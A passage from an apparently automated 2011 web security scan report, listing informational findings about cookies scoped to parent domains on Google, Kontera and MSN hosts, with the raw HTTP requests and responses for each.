rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; udm_0=MLv3NSMJaSpn3g1FgecyID/YTWjxcmn+jRwDtK6yKGSqLiDCbz2rscDhNkPJfBSzlL4dxsqrgwGwTcU0yVOl93x0bsnVOXBsYOd//QgpPolrbS4+Nw8pZmwuLu/BFF7QsvnGgRit9IQdrMe68QJG+xARlbfeqCut/4QAwRNJQR/XlVBysq/jrFHdWb+7tcucPJDdqOzrQiKJQMWveoQqCvYVuCItXlfGZkoyggle3az/HvQUB76nGMvM6aK+iHbgmmWUZ7vTesbzpgDUtcCDBy1OP8b/EWRyH4uNf3IiIEN7uN/unTN7wj+d3aJN+S/uAmGvQTMbx92ct+tNW/fLsANU3MGbWx9PWZB8OCJZ1Jjg7/r6sb6HKhDbfUhULrzcm41SNIyqo/UPwJQztEuuuiLIririPZSp5K8cha5iUvwBePNVNuTjmqDgmws5XPyigl5UM6qcPfeQiBpeVKzEw1/Vq2msHxmzpfSHKTD8e90Ps1HEYrkFOPic6v6njtkrtHLHDXb971WO7HB/0bEjCaOTtCC9kXesDSj90s8MzA++V01FrJ3dgnIeesBl0xJxLJRIU5VhoyLHXgkVIX37uD6r7oH0cMDf2K7Eaupks0wRDpggvT5EFH8JlWlBVNXM79nOtYm2WHhGrjCqhrat51GMQL5cfCHYT3mZFcmfFrSHZGkbkOFSTPWvaB2MEzzvZmVxJjOFYAeGcJdekdsk/yPfbRlXWhTqBzXFxnBdkAVVgrh2H6Jj/iMj22RD7lrrnu0tLor5OZ8cn6Ym51edHhgpShQyzLU9V8EG0n7wfEQLBINnz6LPBtX6+8SS5RQrtiF/eGzW8dYK23z34XahxqULrJN5RQMIu5VTy7/Ghw6qjoZ/sD5mTNDI+RcSBdg0d0+9f7uCZnkisLc6SVCJ5iUT5F9LuU/+AfJo2l8alr6bDLTj2kS4UGIT3Ac5OdkWIBI/wfXDydN6T1e3I63W6L/h9vQpbrgZAA/KjPp2Yq4gjVuQsW3u4AbuNaZJ51egQSvC1zJn+6C/ibzxCxGnJ3bIiVn23LgeutuBiHfVN+6fwIGIhfLz3WmndFELqStWoNJq+LCRtr5BMYrCX5JQu49xYlIiFztxwRQPG4DDLowZx9qjXQOR8xq6IWWic6t7idKbOc4DlCW/3azG8wjO4MNyD2fCSb0csZSqhgdPg8/egWktt/TP2cZ4dhF+JU3+tmQ7e5p2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvv9SEJaSpn5l6pKNOgJzc7zXFBImlqLQZYGOfvoT8h7Ts3xm/ap8Mkb9Q+GVTuR5n80ave3qy14HbyO8+Tcni3oWJVsXNJZ2BoNcclQkVAkXBr3QjDZUGqY/VB76lycBkbXZ/PmM5ZvqG73GQvL4NN3zYvKIXx9zvKHgRcUGOKdYPdUASY9ojdIV8gYJGQFNpzGY2z0gWMDX4TxCEac8R3Ke9ppb194xfECkX2pU1O1iHFy42uElW4j5+v/f8eKkFQ5MzvYE/jyv/rdQiQ09Ai+GU/SjsOZnNQhSBqoMRy93up9vn3PUZA45DM7V+v2Zgn8PXHeSPS85ij7VFR9oQiUVQO38lZzBhUE4hFvl3EkuGg0bi17IV4EBRVWiGu2RmG1QDm5JKJTNslOkv1LdL89z3GMvpJmvs+T5vdyHmAWeZtfRM9cFdfQGSZJjmNUVtgqHDCEiPN0vrW3gnfNbz8nrxNp/cOhwEmsOuhPOMUp+bhkRfmz9kYr5Jnari/GTw58CYqV8h4rzD7qgsc6K4ko5+gPLeQCL5fF69RvQ7fHNZCY0Wgm6mdclFvksFmiNCBpS9srXF7bYyO3+oeVB4D8j5B9nxiUjybPaivGWNDOgiQD79UoUb73FJ7Wm2q4yQrEhX1SpimuhPzRYA0qz7LRvSc3Zoyp+uKsqctxrNIF98i4/5zjBOYg6j/oTeItuQpdMgnyCRARTjQVRzDG96I9Zo6QAEqZ+Y0Iv7BJZL6jkVTjliHFn3FYRW3KH63Oo2bPpUYPX3DgLj6a3b3noH5DkkVQsOSyax16pb5DFwSyDDHu/ugupu5TH8NhEFXauRtWMQprWMn/RWgZFUzttuV9+nL1UnJeHsmWcaceq2g5cjxG1QCGzBbIio/mVhYuhpLzriZs7gmMWx57OH6EAkOz81CWKdorEUgfK0LHu/h+pCNMEHMQhgIlyLysXM8hjqWOr2q1JiFiQmE8C5vXaiir/3o/JYyvxUU0zqT2uM0qnKPCWoCbsd3re35olXtVu8xecblsDX5g66gqZsTE6PDW8nGDZGkIdAGFJ7PZeycd5UmrQSEfWKf4cgvbrqXv0XExi2hrQTYXR0Ql4YjukjJ8J5wlmXH0J4hY3uL+VfDSeK4BvrrNJu19JkjkefmVpbC4yYpcu0I0IY4u43Hkcwa1LL+N8+mYbQTmfoGF5IQ+frCKYD5ncwZ04oRqB8G8Y3clOManGAsTIJJC1Hgb3tiZMPDnWHX1HKz; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:16 GMT; Path=/
Last-Modified: Wed, 02 Feb 2011 15:11:16 GMT
Cache-Control: max-age=3600, private
Expires: Wed, 02 Feb 2011 16:11:16 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Wed, 02 Feb 2011 15:11:16 GMT
Content-Length: 5758

//Vermont-12.4.0-1012
var rsi_now= new Date();
var rsi_csid= 'F08747';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba
...[SNIP]...

11.89. http://khm0.google.com/kh/v/x3d78/x26 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khm0.google.com
Path:	/kh/v/x3d78/x26

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=597da63009975a31:TM=1296660737:LM=1296660737:S=dj3MDnS0o7lzEybf; expires=Fri, 01-Feb-2013 15:32:17 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d78/x26 HTTP/1.1
Host: khm0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=597da63009975a31:TM=1296660737:LM=1296660737:S=dj3MDnS0o7lzEybf; expires=Fri, 01-Feb-2013 15:32:17 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 15:32:17 GMT
Server: btfe
Content-Length: 1368
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

11.90. http://khm1.google.com/kh/v/x3d78/x26 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khm1.google.com
Path:	/kh/v/x3d78/x26

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=6150361c4ff61aec:TM=1296660738:LM=1296660738:S=KMYUbLyfTtUioz77; expires=Fri, 01-Feb-2013 15:32:18 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh/v/x3d78/x26 HTTP/1.1
Host: khm1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=6150361c4ff61aec:TM=1296660738:LM=1296660738:S=KMYUbLyfTtUioz77; expires=Fri, 01-Feb-2013 15:32:18 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Wed, 02 Feb 2011 15:32:18 GMT
Server: btfe
Content-Length: 1368
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

11.91. http://khmdb0.google.com/kh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khmdb0.google.com
Path:	/kh

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=f9ac3558c946f1bf:TM=1296574515:LM=1296574515:S=GYTuoTJIwZnulK74; expires=Thu, 31-Jan-2013 15:35:15 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb0.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=f9ac3558c946f1bf:TM=1296574515:LM=1296574515:S=GYTuoTJIwZnulK74; expires=Thu, 31-Jan-2013 15:35:15 GMT; path=/; domain=.google.com
Date: Tue, 01 Feb 2011 15:35:15 GMT
Server: btfe
Content-Length: 1356
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

11.92. http://khmdb1.google.com/kh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://khmdb1.google.com
Path:	/kh

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=0f7b297aa78cda55:TM=1296574516:LM=1296574516:S=u4YfcXlDueAKsrh4; expires=Thu, 31-Jan-2013 15:35:16 GMT; path=/; domain=.google.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /kh HTTP/1.1
Host: khmdb1.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=0f7b297aa78cda55:TM=1296574516:LM=1296574516:S=u4YfcXlDueAKsrh4; expires=Thu, 31-Jan-2013 15:35:16 GMT; path=/; domain=.google.com
Date: Tue, 01 Feb 2011 15:35:16 GMT
Server: btfe
Content-Length: 1356
X-XSS-Protection: 1; mode=block
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<title>404 Not Found</title>
<style><!--
body {font-family: arial,sans-serif}
div.nav {margin-top: 1ex}
div.nav A {fon
...[SNIP]...

11.93. http://kona32.kontera.com/KonaGet.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kona32.kontera.com
Path:	/KonaGet.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

KONA_USER_GUID=123B26B2-2E10-11E0-80DD-00163E201266; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.kontera.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KonaGet.js HTTP/1.1
Host: kona32.kontera.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Content-Length: 17
Set-Cookie: KONA_USER_GUID=123B26B2-2E10-11E0-80DD-00163E201266; expires=Fri, 31-Dec-2020 23:59:59 GMT; path=/; domain=.kontera.com
Connection: close

Illegal Request

11.94. http://latino.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://latino.msn.com
Path:	/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=9d545b8e7c294f73be8077c433db73e1; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: latino.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:32:21 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: CO1MPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=9d545b8e7c294f73be8077c433db73e1; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
Set-Cookie: mh=MSFT; domain=.msn.com; expires=Fri, 01-Feb-2013 11:54:13 GMT; path=/
Set-Cookie: hpsvr=D:blu|W:F|P:W; domain=.latino.msn.com; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: hpcli=0|W.1.1; domain=.latino.msn.com; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: hpwea=wc:USNY0996; domain=.latino.msn.com; expires=Sun, 01-Jan-2017 08:00:00 GMT; path=/
Set-Cookie: FlightGroupId=93; domain=latino.msn.com; expires=Fri, 01-Feb-2013 15:32:21 GMT; path=/
Set-Cookie: FlightId=BasePage; domain=latino.msn.com; expires=Fri, 01-Feb-2013 15:32:21 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 72483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="es-us" lang="es-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

11.95. http://lifestyle.msn.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=2a12c3db76554c88bcc15f3d1972d7d1; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=446F7968FE604E76BC57FDFC6FE2F8F8; domain=.msn.com; expires=Sun, 21-Aug-2011 15:32:57 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:32:57 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA12
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=2a12c3db76554c88bcc15f3d1972d7d1; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=446F7968FE604E76BC57FDFC6FE2F8F8; domain=.msn.com; expires=Sun, 21-Aug-2011 15:32:57 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 31394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

11.96. http://lifestyle.msn.com/relationships/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=19b8b919321c4b70a4c56228d47fe5d7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D7D346F140D24800A7F7C7D8AE9E7587; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:36 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/ HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:33:36 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=19b8b919321c4b70a4c56228d47fe5d7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D7D346F140D24800A7F7C7D8AE9E7587; domain=.msn.com; expires=Sun, 21-Aug-2011 15:33:36 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 37351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...

11.97. http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/staticslideshowglamour.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=f9e342628c86424dbe17a9b36721ff3e; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=510B51B44D8441759249F9B01D1FC431; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:23 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/staticslideshowglamour.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA14
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f9e342628c86424dbe17a9b36721ff3e; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=510B51B44D8441759249F9B01D1FC431; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:23 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 34781

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.98. http://lifestyle.msn.com/relationships/your-money-today/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/relationships/your-money-today/article.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=aed3eab0d2944a70a4acb0f61a52979f; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=A244C42C3EB543068F140045C0B53D89; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:22 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /relationships/your-money-today/article.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 15:35:22 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://lifestyle.msn.com/relationships/articleindex.aspx
Set-Cookie: MC1=V=3&GUID=aed3eab0d2944a70a4acb0f61a52979f; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A244C42C3EB543068F140045C0B53D89; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:22 GMT; path=/
Cache-Control: no-cache
Content-Length: 0

11.99. http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-home/cleaning-organizing/staticslideshowrs.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=410267d1726a48e480f7cffabbfdbf02; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D8AA77AA6972477889BB0708E24E1D83; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:28 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-home/cleaning-organizing/staticslideshowrs.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA09
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=410267d1726a48e480f7cffabbfdbf02; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D8AA77AA6972477889BB0708E24E1D83; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.100. http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-life/family-fun/staticslideshowrs.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=fcb37a0085454e42a154dc796c3627c6; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=587C4F381A484F638F5133EFD31A25BE; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:27 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/family-fun/staticslideshowrs.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:27 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA15
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fcb37a0085454e42a154dc796c3627c6; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=587C4F381A484F638F5133EFD31A25BE; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:27 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 33334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

11.101. http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-life/new-year-new-you/article.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=86c5ac9c5d5248acbd08455e21fd0f6c; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=D57F67F0B6374E41BE43B798CE54D9DE; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:25 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-life/new-year-new-you/article.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 01 Feb 2011 15:35:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://lifestyle.msn.com/your-life/bigger-picture/default.aspx
Set-Cookie: MC1=V=3&GUID=86c5ac9c5d5248acbd08455e21fd0f6c; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D57F67F0B6374E41BE43B798CE54D9DE; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:25 GMT; path=/
Cache-Control: no-cache
Content-Length: 0

11.102. http://lifestyle.msn.com/your-look/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=15f7dd757e1f4dd29c256ddabb4fbc01; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=8F8656FEF23A4A4BB26DBD1791075CFD; domain=.msn.com; expires=Sun, 21-Aug-2011 15:32:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/ HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:32:59 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=15f7dd757e1f4dd29c256ddabb4fbc01; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8F8656FEF23A4A4BB26DBD1791075CFD; domain=.msn.com; expires=Sun, 21-Aug-2011 15:32:59 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 36572

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

11.103. http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.msn.com
Path:	/your-look/celebrity-style/staticslideshowmc.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

MC1=V=3&GUID=db3e8205e43d4e5eaa57a6d1324745b7; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
MUID=ADBCA3C4A108460A871E079DD85C62EB; domain=.msn.com; expires=Sat, 20-Aug-2011 15:35:19 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /your-look/celebrity-style/staticslideshowmc.aspx HTTP/1.1
Host: lifestyle.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:35:19 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA10
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
